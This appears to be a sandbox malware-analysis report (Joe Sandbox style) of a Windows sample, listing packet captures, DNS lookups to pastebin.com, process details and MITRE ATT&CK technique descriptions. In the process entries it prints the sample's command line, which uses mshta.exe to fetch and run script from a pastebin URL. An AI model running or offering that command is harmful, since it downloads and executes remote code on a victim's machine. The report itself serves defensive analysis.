	PO 122001-221.ppam	Get hash	malicious	Browse	104.23.98.190
	rj2b9a7ojM.exe	Get hash	malicious	Browse	104.23.98.190
	ORDER-111-0200657-6996224.docm	Get hash	malicious	Browse	104.23.98.190
	Edge.js	Get hash	malicious	Browse	104.23.98.190
	Edge.js	Get hash	malicious	Browse	104.23.98.190

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1] Download File
Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.5219280948873621
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0....

Static File Info

No static file info

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 30
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 15:20:06.332938910 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.349116087 CEST	80	49706	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.349206924 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.349721909 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.365735054 CEST	80	49706	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.374855042 CEST	80	49706	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.374970913 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.382392883 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.398643970 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.398750067 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.421760082 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.439296961 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.443039894 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.443064928 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.443106890 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.443141937 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.504663944 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.521048069 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.521667957 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.521730900 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.534980059 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:20:06.551239967 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.794533014 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.794558048 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:20:06.794694901 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:21:56.019054890 CEST	49707	443	192.168.2.3	104.23.98.190
Aug 24, 2021 15:21:56.019391060 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:21:56.035758018 CEST	80	49706	104.23.98.190	192.168.2.3
Aug 24, 2021 15:21:56.035800934 CEST	443	49707	104.23.98.190	192.168.2.3
Aug 24, 2021 15:21:56.035924911 CEST	49706	80	192.168.2.3	104.23.98.190
Aug 24, 2021 15:21:56.035979033 CEST	49707	443	192.168.2.3	104.23.98.190

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 15:19:57.599718094 CEST	58643	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:19:57.635255098 CEST	53	58643	8.8.8.8	192.168.2.3
Aug 24, 2021 15:19:58.993309975 CEST	60985	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:19:59.034188986 CEST	53	60985	8.8.8.8	192.168.2.3
Aug 24, 2021 15:19:59.059933901 CEST	50200	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:19:59.096115112 CEST	53	50200	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:01.370290995 CEST	51281	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:01.404117107 CEST	53	51281	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:06.280817986 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:06.318922997 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:29.097012043 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:29.137916088 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:32.789983988 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:32.825045109 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:50.564847946 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:50.611614943 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 24, 2021 15:20:53.179208994 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:20:53.223295927 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 24, 2021 15:21:07.340607882 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:21:07.376796007 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 24, 2021 15:21:10.140362978 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:21:10.177571058 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 24, 2021 15:21:44.867356062 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:21:44.899879932 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 24, 2021 15:21:47.522078037 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 24, 2021 15:21:47.558231115 CEST	53	58361	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2021 15:19:57.599718094 CEST	192.168.2.3	8.8.8.8	0xe584	Standard query (0)	clientconfig.passport.net	A (IP address)	IN (0x0001)
Aug 24, 2021 15:20:06.280817986 CEST	192.168.2.3	8.8.8.8	0x9d6f	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2021 15:19:57.635255098 CEST	8.8.8.8	192.168.2.3	0xe584	No error (0)	clientconfig.passport.net	authgfx.msa.akadns6.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 15:20:06.318922997 CEST	8.8.8.8	192.168.2.3	0x9d6f	No error (0)	pastebin.com		104.23.98.190	A (IP address)	IN (0x0001)
Aug 24, 2021 15:20:06.318922997 CEST	8.8.8.8	192.168.2.3	0x9d6f	No error (0)	pastebin.com		104.23.99.190	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

pastebin.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49706	104.23.98.190	80	C:\Windows\SysWOW64\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 15:20:06.349721909 CEST	1084	OUT	GET /raw/i5mSzahw HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: pastebin.com Connection: Keep-Alive
Aug 24, 2021 15:20:06.374855042 CEST	1130	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 24 Aug 2021 13:20:06 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 24 Aug 2021 14:20:06 GMT Location: https://pastebin.com/raw/i5mSzahw Server: cloudflare CF-RAY: 683ce047ba8e536a-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 24, 2021 15:20:06.443064928 CEST	104.23.98.190	443	192.168.2.3	49707	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sat Jul 17 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Sun Jul 17 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Aug 24, 2021 15:20:06.443064928 CEST	104.23.98.190	443	192.168.2.3	49707	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

• cmd.exe
• conhost.exe
• mshta.exe

Click to jump to process

Memory Usage

• cmd.exe
• conhost.exe
• mshta.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• cmd.exe
• conhost.exe
• mshta.exe

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6360 Parent PID: 4864

Function Logs

General

Start time:	15:20:03
Start date:	24/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Section Activities

Sections loaded by Windows

Show Windows behavior

Process Activities

Process Created

Process Information Set

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: conhost.exe PID: 6368 Parent PID: 6360

Function Logs

General

Start time:	15:20:03
Start date:	24/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Attributes Queried

Volume Information Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Mutex Created

Show Windows behavior

Process Activities

Show Windows behavior

Memory Activities

LPC Port Activities

Chronological Activities

Analysis Process: mshta.exe PID: 6416 Parent PID: 6360

Function Logs

General

Start time:	15:20:04
Start date:	24/08/2021
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw
Imagebase:	0xe70000
File size:	13312 bytes
MD5 hash:	7083239CE743FDB68DFC933B7308E80A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Show Windows behavior

Network Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Code Analysis

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Data Obfuscation:

Jbx Signature Overview

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: cmd.exe PID: 6360 Parent PID: 4864

General

File Activities

File Opened

File Created

File Attributes Queried

Volume Information Queried

Section Activities

Sections loaded by Windows